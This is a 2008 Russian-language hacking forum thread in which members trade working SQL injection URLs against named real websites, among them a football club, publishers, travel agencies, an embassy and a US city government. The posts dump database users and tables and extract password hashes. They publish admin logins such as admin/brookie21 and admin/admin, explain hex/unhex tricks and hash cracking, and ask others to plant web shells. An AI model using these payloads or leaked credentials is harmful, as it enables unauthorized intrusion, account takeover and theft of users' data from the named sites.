SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Любителям "ЛЮДИ-Х"
    login.php

    но аплоадит только джпеги, правда особо не разбиралса...

    ================================================================

    version 4.1.22-standard-log
    User lancsfire@localhost
     
    #6401 $n@ke, 26 Aug 2008
    Last edited: 26 Aug 2008
  2. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    решил попробавать добить этот сайт, но
    таблицу форума нашол

    http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMATION_SCHEMA.TABLES+limit+70,1&te=0

    а поюзать я её не могу :(

    вот

    http://ledi.ru/news.php?id=-13+union+select+1,2,3,column_name,5,6+from+INFOTMATION_SCHEMA.COLUMNS+where+table_name=0x6962665f6d6f64657261746f7273&te=0

    :confused:

    0x6962665f6d6f64657261746f7273 = ibf_moderators
    --------------
    если кто зделает, покажите?
     
  3. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Aac.ur.ru - Меня попросили проголосовать за одну девченку))
    4 версия...
    рут..


    SeNaP
     
  4. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    sabe, можеш пояснить, вот это "unhex(hex" ? :)

    для чего это нужно?

    и откуда ты получил вот эту таблицу?
    " member_login_key"
     
    #6404 SeNaP, 26 Aug 2008
    Last edited: 26 Aug 2008
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    SeNaP
    hex() - это конвертация стринга в хекс..
    unhex() - обратная функция...
    используем эту конструкцию вместе чтобы не было таких ошибок как у тебя ;)

    member_login_key - это стандартное поле где хранятся пассы от IPB
     
    #6405 sabe, 26 Aug 2008
    Last edited: 26 Aug 2008
    1 person likes this.
  6. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    Все читают книжки? xD
    Издательство "Эксмо"

    http://www.eksmo.ru/catalog/book?b=1'

    http://www.eksmo.ru/catalog/book?b=61308+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*

    4.0.21-standard-log

    Издательство "Народное"

    http://literati.ru/list4.php?rub=1'

    http://literati.ru/list4.php?rub=-1+union+select+1,2,3,4/*

    4.1.22-log
     
    #6406 $p01nt, 26 Aug 2008
    Last edited: 26 Aug 2008
    2 people like this.
  7. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Мой нормальный SQL-inJ =)

    А теперь после книжек идем на рыбалку :D
    --------------
    Базы ДанныХ
    http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,table_name,3+from+INFORMATION_SCHEMA.TABLES&limit=0
    --------------
    Таблицы в форуме
    http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,column_name,3+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='phpbb_users'&limit=0
    ---------------
    Юзеры форума
    КЕШ(пароль не расшифрованный) = ЛОГИН
    http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,(concat_ws(0x3d,user_password,username)),3+from+phpbb_users&limit=0

    ----------------
    Форум _http://www.flyfishinginnh.com/forum/
    логин:admin
    Пароль: 1 или brookie21
    так как я по английскому не хрена не шарю :D
    пороль 1 или brookie21
    Логин: admin
    -----------------
    Кто сможет залить шел, отпишитесь пожалуйчто в ЛС ;)
     
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    SeNaP
    admin;brookie21

    но форум не тот что ты указал это булка. у тебя хеш от phpbb ищи phpbb дам шелл нету phpbb ищи в базе поля от vb +))))))))
     
    1 person likes this.
  9. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Давайте посетим сайт футбольного клуба Анжи.
    http://www.fc-anji.ru

    Code:
    http://www.fc-anji.ru/news.php?id=-341+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6/*
    version() - 4.1.22
    user() - opendag@localhost
    database() - wwwopendagru

    Раскрытие пути:
    /www/opendag/users/opendag-fcanji/www/htdocs/news.php

    К information_schema и mysql.user доступа нету(
     
  10. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    конечно к information_schema доступа не будет.. этож 4 версия.. там его просто нет=)
     
  11. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://www.nord-east.ru/index.php?id=-1111+union+select+1,table_name,3,4+from+information_schema.tables+limit+0,1--
    Строительная компания какая-то -)
    только в табличках нифига толкового нету.
     
  12. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    :)
    Турфирма Эл ь ф-СПб
    http://www.bustur.ru


    Code:
    http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,concat_ws(version(),0x3a,user(),0x3a,database())--
    version() - 5.1.19-beta
    user() - petrotour@localhost
    database() - petrotour

    Есть контакт! Пошли таблички:

    Code:
    http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,table_name+from+information_schema.tables--
    ----------------------------------------------------------------

    http://santechmart.ru
    Code:
    http://santechmart.ru/print.php?id=-1+union+select+concat_ws(version(),0x3a,user(),0x3a,database())--
    version() - 5.0.41-log
    user() - [email protected]
    database() - santechmartru

    Табличке:

    Code:
    http://santechmart.ru/print.php?id=-1+union+select+table_name+from+information_schema.tables+limit+1,1--
    Перебирать по: 2,1 ; 3,1 ; 4,1 и т.д. :)
     
    #6412 USAkid, 27 Aug 2008
    Last edited: 27 Aug 2008
    1 person likes this.
  13. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    http://www.pc-olymp.ru/gymnastik/index.php3?page=-1+union+select+concat(login,0x3a3a,pwd),2,3,4+from%20+users+limit+0,10/*

    админка http://www.pc-olymp.ru/admin/
    пароль и пасс
    admin;admin
     
  14. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Посольство Вьетнамское в Штатах.
    Dbname: vnemb_news2004
    Version:4.1.20-log
    User:[email protected]
     
  15. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Америкосовские сайтеги... ы)

    http://www.fairelections.us

    Code:
    http://www.fairelections.us/article.php?id=-104+union+select+1,2,unhex(hex(version())),4,5--
    version() - 5.0.45-community-log
    user() - ourcoupl_fairele@localhost
    database() - ourcoupl_fairelections

    От вывода инфы я офигел. Еле-еле-еле нашел. В общем снизу слева есть ссылочка: "Printer Safe Version", смотрим ее и видим интересующую нас инфу.

    Таблички перебираем лимитом limit+2,1 ; 3,1 и т.д.

    Code:
    http://www.fairelections.us/article.php?id=-104+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+2,1--
     
  16. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Ну что? Давайте пойдем покрупнее.

    The City of Bremerton, WA

    http://www.ci.bremerton.wa.us

    На этом сайте я вообще вывода почти не нашел если бы НЕ циферка в коде, попавшаяся мне на глаза :)

    Code:
    http://www.ci.bremerton.wa.us/display.php?id=1039+union+select+1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14/*
    version() - 4.1.12-log
    user() - bremcity@localhost
    database() - bremcity

    Гуд выводы пошли, хорошо шифруются :)
     
    1 person likes this.
  17. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.host-sweet.com/profile/host.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*
    Code:
    http://www.demonews.de/artikel/index.php?artikel=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())/*
     
    1 person likes this.
  18. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Code:
    http://progmusic.ru/space/discography.php?id=-5+union+select+1,2,(concat_ws(0x3d,user_pass,user_fname,user_mail)),4,5,6,7,8+from+admin_users+limit+0,1--
    Пасс=логин=мыло

    вот только я с с паролями разобратся не смог, это же ведь не MD5, и как и брутить? :confused:
     
    1 person likes this.
  19. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*
    Так?
     
  20. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    2 SeNaP
    А хэши по-твоему только md5 в природе существуют ? По длине хэша, это скорее всего mysql хэш, брутить Passwords Pro
    www.hashcracking.info рулит
    43e9a4ab75570f5b : admin

    2 geforse
    Пипл, вы пистец, вы статьи читайте. С чего ты решил что полей 8 ? Unknown column '8' in 'order clause'
    И для вопросов существует отдельная тема. Джифорс, читай статьи.
    Эмм, сначала я прогнал, решив, что полей два. Пасиба .Begemot.'y, который меня поправил ^^
     
    #6420 0nep@t0p, 27 Aug 2008
    Last edited: 28 Aug 2008
    2 people like this.
Thread Status:
Not open for further replies.